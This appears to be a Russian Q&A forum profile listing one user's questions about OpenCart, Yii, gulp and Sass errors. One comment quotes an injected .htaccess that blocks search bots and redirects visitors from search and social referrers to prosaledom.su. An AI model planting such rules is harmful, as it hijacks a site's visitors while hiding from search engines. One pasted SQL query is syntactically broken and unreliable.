Задать вопрос
  • Не могу распечатать массив из таблицы в Yii. Не видит модель Ccategory. Как пофиксить?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Arik, Вот именно что не забыл указать пространство имен, не могу понять логики. Если все пути заданы верно, на основе чего он выдает такую ошибку.
  • Что меняет содержимое .htaccess?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    RewriteEngine On

    RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|Baiduspider) [NC]
    RewriteRule .* - [R=403,L]

    RewriteCond %{HTTP_REFERER} .*google.* [OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [OR]
    RewriteCond %{HTTP_REFERER} .*baidu.* [OR]
    RewriteCond %{HTTP_REFERER} .*youtube.* [OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR]
    RewriteCond %{HTTP_REFERER} .*qq.* [OR]
    RewriteCond %{HTTP_REFERER} .*excite.* [OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
    RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
    RewriteCond %{HTTP_REFERER} .*search.* [OR]
    RewriteCond %{HTTP_REFERER} .*bing.* [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile.* [OR]
    RewriteCond %{HTTP_REFERER} .*facebook.* [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
    RewriteCond %{HTTP_REFERER} .*gmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*twitter.* [OR]
    RewriteCond %{HTTP_REFERER} .*googlemail.* [OR]
    RewriteCond %{HTTP_REFERER} .*inbox.* [OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [OR]
    RewriteCond %{HTTP_REFERER} .*hotmail.* [OR]
    RewriteCond %{HTTP_REFERER} .*blog.* [OR]
    RewriteCond %{HTTP_REFERER} .*live.* [OR]
    RewriteCond %{HTTP_REFERER} .*myspace.* [OR]
    RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
    RewriteCond %{HTTP_REFERER} .*mail.* [OR]
    RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
    RewriteCond %{HTTP_REFERER} .*ya.* [OR]
    RewriteCond %{HTTP_REFERER} .*aport.* [OR]
    RewriteCond %{HTTP_REFERER} .*linkedin.* [OR]
    RewriteCond %{HTTP_REFERER} .*flickr.*
    RewriteRule ^(.*)$ prosaledom.su [R=301,L]

    ErrorDocument 404 prosaledom.su

    Вот такая фигня появляется(
  • Как сделать тег select в альфавитном порядке?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    <blockquote><?php
    // *	@copyright	OPENCART.PRO 2011 - 2017.
    // *	@forum	http://forum.opencart.pro
    // *	@source		See SOURCE.txt for source and other copyright.
    // *	@license	GNU General Public License version 3; see LICENSE.txt
    
    class ModelLocalisationZone extends Model {
    	public function getZone($zone_id) {
    		$query = $this->db->query("SELECT * FROM " . DB_PREFIX . "zone WHERE zone_id = '" . (int)$zone_id . "' AND status = '1'  ORDER BY country_shipping_address[country_id], region_shipping_address[zone_id]");
          
    		return $query->row;
    	}
    
    	public function getZonesByCountryId($country_id) {
    		$zone_data = $this->cache->get('zone.' . (int)$country_id);
    
    		if (!$zone_data) {
    			$query = $this->db->query("SELECT * FROM " . DB_PREFIX . "zone WHERE country_id = '" . (int)$country_id . "' AND status = '1' ORDER BY country_shipping_address[country_id], region_name");
    
    			$zone_data = $query->rows;
    
    			$this->cache->set('zone.' . (int)$country_id, $zone_data);
    		}
    
    		return $zone_data;
    	}
    }</blockquote>

    Вот так написал
    Александр,
  • Почему выходит ошибка?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Stimulate, И все равно не помогло(
  • Почему выходит ошибка?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Stimulate, Вы все таки правы. Я только изучаю PHP, занимаюсь в основном дизайном и версткой. PHP - шник заболел. Меня напрягают, а вот что делать с этим не знаю.
  • Почему выходит ошибка?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    В@Stimulate,
    Вот так?
    php_value error_reporting 7
    # 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

    # 2. In your opencart directory rename htaccess.txt to .htaccess.

    # For any support issues please visit: www.opencart.com

    Options +FollowSymlinks

    # Prevent Directoy listing
    Options -Indexes

    # Prevent Direct Access to files

    Require all denied
    ## For apache 2.2 and older, replace "Require all denied" with these two lines :
    # Order deny,allow
    # Deny from all

    # SEO URL Settings
    RewriteEngine On
    # If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

    RewriteBase /
    RewriteRule ^sitemap.xml$ index.php?route=extension/feed/google_sitemap [L]
    RewriteRule ^googlebase.xml$ index.php?route=extension/feed/google_base [L]
    RewriteRule ^system/download/(.*) index.php?route=error/not_found [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_URI} !.*\.(ico|gif|jpg|jpeg|png|js|css)
    RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]

    ### Additional Settings that may need to be enabled for some servers
    ### Uncomment the commands by removing the # sign in front of it.
    ### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

    # 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
    # php_flag register_globals off

    # 2. If your cart has magic quotes enabled, This may work to disable it:
    # php_flag magic_quotes_gpc Off

    # 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
    # php_value upload_max_filesize 999M

    # 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value post_max_size 999M

    # 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value max_execution_time 200

    # 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value max_input_time 200

    # 7. disable open_basedir limitations
    # php_admin_value open_basedir none

  • Почему выходит ошибка?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Stimulate,
    # 1.To use URL Alias you need to be running apache with mod_rewrite enabled.

    # 2. In your opencart directory rename htaccess.txt to .htaccess.

    # For any support issues please visit: www.opencart.com

    Options +FollowSymlinks

    # Prevent Directoy listing
    Options -Indexes

    # Prevent Direct Access to files

    Require all denied
    ## For apache 2.2 and older, replace "Require all denied" with these two lines :
    # Order deny,allow
    # Deny from all

    # SEO URL Settings
    RewriteEngine On
    # If your opencart installation does not run on the main web folder make sure you folder it does run in ie. / becomes /shop/

    RewriteBase /
    RewriteRule ^sitemap.xml$ index.php?route=extension/feed/google_sitemap [L]
    RewriteRule ^googlebase.xml$ index.php?route=extension/feed/google_base [L]
    RewriteRule ^system/download/(.*) index.php?route=error/not_found [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_URI} !.*\.(ico|gif|jpg|jpeg|png|js|css)
    RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]

    ### Additional Settings that may need to be enabled for some servers
    ### Uncomment the commands by removing the # sign in front of it.
    ### If you get an "Internal Server Error 500" after enabling any of the following settings, restore the # as this means your host doesn't allow that.

    # 1. If your cart only allows you to add one item at a time, it is possible register_globals is on. This may work to disable it:
    # php_flag register_globals off

    # 2. If your cart has magic quotes enabled, This may work to disable it:
    # php_flag magic_quotes_gpc Off

    # 3. Set max upload file size. Most hosts will limit this and not allow it to be overridden but you can try
    # php_value upload_max_filesize 999M

    # 4. set max post size. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value post_max_size 999M

    # 5. set max time script can take. uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value max_execution_time 200

    # 6. set max time for input to be recieved. Uncomment this line if you have a lot of product options or are getting errors where forms are not saving all fields
    # php_value max_input_time 200

    # 7. disable open_basedir limitations
    # php_admin_value open_basedir none

  • Почему выходит ошибка?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Просто вставить данный код?
  • Что за ошибки вылезли на сайте?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    YaRobot, Дело в том что это шаблон. В прошлой теме я не корректно задал вопрос. Тут по крайней мере я понял откуда руки растут. Но все равно не смог решить проблему, а прошлую тему удалить не получилось.(
  • Что за ошибки вылезли на сайте?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Как его удалить чтобы ни на чего не повлияло?
  • Пригодиться ли такая таблица новичкам, изучающим верстку?

    Все таки правильная цель для изучения html и css. Но немного не практичная. Все таки html и css не ограничивается таблицами. Вам азов будет достаточно. В первое время вы все равно будете пользоваться справочниками. Желаю вам успехов в начинаниях.
  • Не могу войти в админку в opencart. Что делать?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Warning: fopen(/home/x/x89372pw/belsant.ru/public_html/catalog/view/theme//stylesheet/bootstrap.css): failed to open stream: No such file or directory in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 14Warning: flock() expects parameter 1 to be resource, boolean given in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 16Warning: fwrite() expects parameter 1 to be resource, boolean given in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 18Warning: fflush() expects parameter 1 to be resource, boolean given in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 20Warning: flock() expects parameter 1 to be resource, boolean given in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 22Warning: fclose() expects parameter 1 to be resource, boolean given in /home/x/x89372pw/belsant.ru/public_html/catalog/controller/startup/sass.php on line 24 Fatal error: Uncaught exception 'Twig_Error_Loader' with message 'Unable to find template "common/column_left.twig" (looked into: /home/x/x89372pw/belsant.ru/public_html/catalog/view/theme).' in /home/x/x89372pw/belsant.ru/public_html/system/library/template/Twig/Loader/Filesystem.php:215 Stack trace: #0 /home/x/x89372pw/belsant.ru/public_html/system/library/template/Twig/Loader/Filesystem.php(139): Twig_Loader_Filesystem->findTemplate('common/column_l...') #1 /home/x/x89372pw/belsant.ru/public_html/system/library/template/Twig/Environment.php(312): Twig_Loader_Filesystem->getCacheKey('common/column_l...') #2 /home/x/x89372pw/belsant.ru/public_html/system/library/template/Twig/Environment.php(378): Twig_Environment->getTemplateClass('common/column_l...', NULL) #3 /home/x/x89372pw/belsant.ru/public_html/system/library/template/twig.php(33): Twig_Environment->loadTemplate('common/column_l...') #4 /home/x/x89372pw/belsant.ru/public_html/system/library/template.php(51): Template\Twig->render('common/column_l...', '0') #5 /hom in /home/x/x89372pw/belsant.ru/public_html/system/library/template/Twig/Loader/Filesy

    обновил, вот такую ошибку мне выдал(
  • Ошибка в gulp. Как пофиксить?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Решил проблему после удаления данной строчки
    .hidden
    display: none
  • Ошибка в gulp. Как пофиксить?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    Так в исходном файле их нет
    @import bourbon
    @import fonts.sass
    @import vars.sass
    
    body
    font-size: 16px
    min-width: 320px
    position: relative
    line-height: 1.6
    font-family: arial, sans-serif
    overflow-x: hidden
    
    .hidden
    display: none
    
    .main-head
    background-image: url(img/bg_top.jpg)
    background-size: cover
    background-position: top center
    height: 100vh	
    
    .mnu-line 
    padding-top: 48px
    
    .logo 
    display: block
    width: 100px
    img
    width: 100% 	
    
    nav
     ul 
       list-style-type: none
       padding: 0
       margin: 0	
       li 
       display: inline-block
  • Вылетает gulp во время работы с sass фалом. Что делать?

    mrbagfreeman
    @mrbagfreeman Автор вопроса
    В итоге разобрался сам,
    Мне помогла установка таймаута в watch перед вызовом таска:
    gulp.task('watch', function() {
    
        watch('dev/scss/**/*.scss', {readDelay: 100}, function(event, cb) {
    
                console.log(event.event + ' ' + event.path);
    
                gulp.start('sass');
        });
    
    });